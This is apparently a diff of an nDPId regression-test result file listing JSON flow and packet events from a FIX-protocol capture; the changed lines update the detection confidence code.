00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1493755109655,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA07JVAAEAGb0LAqAAUCBEWH7taD6B8NqfnDJ+ZSYAQhgAbHwAAAQEICho\/VIrKvigo"} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1493755109655,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK7JZAAEAGbuvAqAAUCBEWH7taD6B8NqfnDJ+ZSYAYhgDh+QAAAQEICho\/VIrKvigoOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1493755109941,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109941,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzQAADIGwMPQ9WsDwKgAFA+gshDsZRDXr0wvBlAYWgiDjAAAOD1PATk9MDAyNAEzNT1HAQCIAAAAWQxAldWZn+Q2dgAAAAE="} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7580000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1493755110320,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1493755110320,"pkt":"THK5MeMlACJNe\/gxCABFAAB1U\/wAADIGN9LQ9WsDwKgAFA+glvwzTd9PWnk+l1AYb96N\/wAAOD1PATk9MDA2NgEzNT1HAQHYAAAABVkI5OEMFeFiPZCEMAATlYJyAAAABFkI5OEMFVZHfdCEMAATwIJ3AAAABlkI5OEIW+2APQJxEAQ="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7580000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7580000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1493755110328,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755110328,"pkt":"THK5MeMlACJNe\/gxCABFAABb5\/wAAPUG\/rMIERYfwKgAFA+gn9aNJ1RO\/ryrG4AY\/\/8NBQAAAQEICsq+KsnWRqh9OD1PATk9MDAyOAEzNT1HAQCoAAAAAVkI5OEMBKkS\/dCEMAAJlIEx"} 
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1493755110328,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755110328,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0b9ZAAEAG7AHAqAAUCBEWH5\/WD6D+vKsbjSdUdYAQ\/\/\/knQAAAQEICtZGrHjKvirJ"} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1493755110362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755110362,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAouAtAAEAGhg\/AqAAU0PVrA5b8D6BaeT6XM03fnFAQ\/GxkGwAAAAAAAAAA"} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1493755111422,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1493755111422,"pkt":"THK5MeMlACJNe\/gxCABFAABwiaEAAPUGXPoIERYfwKgAFA+gn9aNJ1R1\/ryrG4AY\/\/+zfAAAAQEICsq+Lw\/WRqx4OD1PATk9MDA0OQEzNT1HAQFQAAAADVkI5OEMFgYg3VCIUAATiYF3AAAADFkI5OEMB9wg3RAAEAATiYAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1493755111956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755111956,"pkt":"THK5MeMlACJNe\/gxCABFAABP7\/wAADIGm\/fQ9WsDwKgAFA+glvYLJrChYuT9OVAYYmg1SgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1493755111956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPOZAAEAGATXAqAAU0PVrA5b2D6Bi5P05CyawyFAQ\/Gz0DgAAAAAAAAAA"} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1493755111956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9POdAAEAGAN\/AqAAU0PVrA5b2D6Bi5P05CyawyFAY\/GyQmgAAOD1GSVhDT01QATk9NzABeJwFwTEKgEAMBEDyII\/dJIu5g7SCP7C1sbPx\/4Uz1cd5jRy02UDKQg2LbFAVafJ2cIfgG+dSraCR3s\/9vUY05fYD3SIN0A=="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1493755113353,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755113353,"pkt":"THK5MeMlACJNe\/gxCABFAABP8tQAADIGmR\/Q9WsDwKgAFA+gmLZKUJEYQJIHD1AYWpQ0OgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1493755113353,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1493755113353,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB8GO1AAEAGJNrAqAAU0PVrA5i2D6BAkgcPSlCRP1AY\/\/\/ZrgAAOD1GSVhDT01QATk9NjkBeJwFwTsKgEAQA1ByICWZnbAfmFbwBrY2djbev\/C9Ucd57bkLs8g0motoWZR7Co4KqtOMTXN5rBaQop77eyGWTPzcug3M"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1493755113404,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755113404,"pkt":"THK5MeMlACJNe\/gxCABFAAAo8tUAADIGmUXQ9WsDwKgAFA+gmLZKUJE\/QJIHY1AQWpSMrwAA"} 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1493755114507,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1493755114507,"pkt":"ACJNe\/gxTHK5MeMlCABFAACB4B9AAEAGe2vAqAAUCBEWH7tQD6DrumPmnOhHQIAY\/+BrUwAAAQEICrFzuwzKvibGOD1GSVhDT01QATk9NjIBeJwNx8ENwDAIA0B5oEYGQxMi8Y3UDbr\/JO39bvV53hHDUE3qhrIJxZ+smkhvp00m\/bLaubYEYzOED2YPC2I="} 
00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1493755115297,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1493755115297,"pkt":"THK5MeMlACJNe\/gxCABFAAB5U\/0AADIGN83Q9WsDwKgAFA+glvwzTd+cWnk+l1AYb976PQAAOD1PATk9MDA3MAEzNT1HAQH4AAAABVkI5OYMFeFg3lAEMAATioF3AAAABFkI5OYMFVZgnhAAEAATiYAAAAAABlkI5OYMW+2AXhAAEAQTiIAA"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1493755116662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755116662,"pkt":"THK5MeMlACJNe\/gxCABFAABP0h0AAC8GyO7ZwFYgwKgAFA+g0FJoqda4F+2kj1AYRRhFXQAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} 
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1493755116662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755116662,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9Lt9AAEAGGv\/AqAAU2cBWINBSD6AX7aSPaKnW31AYhgAmIwAAOD1GSVhDT01QATk9NzABeJwFwTsKgEAMBFByIJeZJMN+IK2wN7C1sbPx\/oXvjTr31bLRZgEpCxUsskD1SJOXgx2CH5xLY4WM9Hru7zWiKNkP3UcN1g=="} 
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1493755116788,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755116788,"pkt":"THK5MeMlACJNe\/gxCABFAAAo0h4AAC8GyRTZwFYgwKgAFA+g0FJoqdbfF+2k5FAQRRid0QAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1493755117668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755117668,"pkt":"THK5MeMlACJNe\/gxCABFAABb6MoAAPUG\/eUIERYfwKgAFA+gn+AbjTX8bvFE4oAY\/\/8xhAAAAQEICsq+R3VyD9Q7OD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} 
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1493755117668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755117668,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK1yxAAEAGhFXAqAAUCBEWH5\/gD6Bu8UTiG402I4AY\/+CkEwAAAQEICnIP3\/PKvkd1OD1GSVhDT01QATk9NzEBeJwFwbENgDAMBEB5IKJ\/Ow5OpG+R2ICWho6G\/QvuSsd5td5oU0BPixQsusCsLEuXgzsSvnGurBXDSNdzf68R4gj7Ad5tDd0="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1493755117687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755117687,"pkt":"THK5MeMlACJNe\/gxCABFAAA09L8AAPUG8hcIERYfwKgAFA+gn+AbjTYjbvFFOIAQ\/\/9+KwAAAQEICsq+R4lyD9\/z"} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":456,"flow_first_seen":1493755109301,"flow_last_seen":1493755132102,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":14279,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1493755109440,"flow_last_seen":1493755131870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1493755110328,"flow_last_seen":1493755132019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":920,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1493755117668,"flow_last_seen":1493755127687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 